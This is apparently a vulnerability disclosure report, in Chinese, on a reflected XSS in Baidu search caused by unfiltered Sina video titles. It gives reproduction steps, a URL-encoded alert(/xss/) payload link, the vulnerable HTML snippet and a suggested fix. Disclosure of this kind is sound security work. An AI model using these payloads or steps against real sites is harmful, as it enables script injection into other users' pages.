百度搜索和新浪视频组合产生反射型XSS(作用域在)

无意间发现的这个漏洞,希望尽快修复,同时这里感谢@blast帮助分析!,好了咱们来看看漏洞是如何构造的吧~

跨站构造过程:

1、 先在新浪视频投稿,视频名称为xss代码,例如</script>alert(/xss/)</script>等待审核通过

2.然后等百度收录以后,在百度搜索这段代码

3.之后由于sina.com返回给百度的视频信息hash表中存储标题的地方没有过滤掉XSS跨站代码导致百度这个综合搜索结果出现了xss

重现跨站漏洞链接:

?word=%22%2F%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&tn=myie2dg&ch=6

1、

2、HASH表没过滤

<a data-click="{    'F':'778717EA',    'F1':'9D73F1E4',    'F2':'4CA6DE6B',    'F3':'54E5343F',    'T':'1369461963',        'y':'DFF9FFF7'              ,'rsv_sug9':'"><script>alert(/xss/)</script> site:video.sina.com.cn'        }"  href="?url=1uq__E6Y0Y3wZnKiqd0vhen-uhLKHE_mU3Zj8isDG2kll_RwYfQRE2v4f3hdwZp6FlmtPLUMhQ619DUPcXN-"   target="_blank" &gt;<em>"/&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;</em>.php__新浪播客</a></h3>     <div class="c-abstract"><em>"/&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;</em>.php相关视频 "/&gt;&lt;... 0  实拍纽约布朗克斯动物园海獭残忍... 0  播-亚冠第4轮: 蒙通联VS广州恒... ...</div>

百度搜索和新浪视频组合产生反射型XSS

3.跨站成功!


百度搜索和新浪视频组合产生反射型XSS

修复方案:过滤综合搜索处合作商返回的结果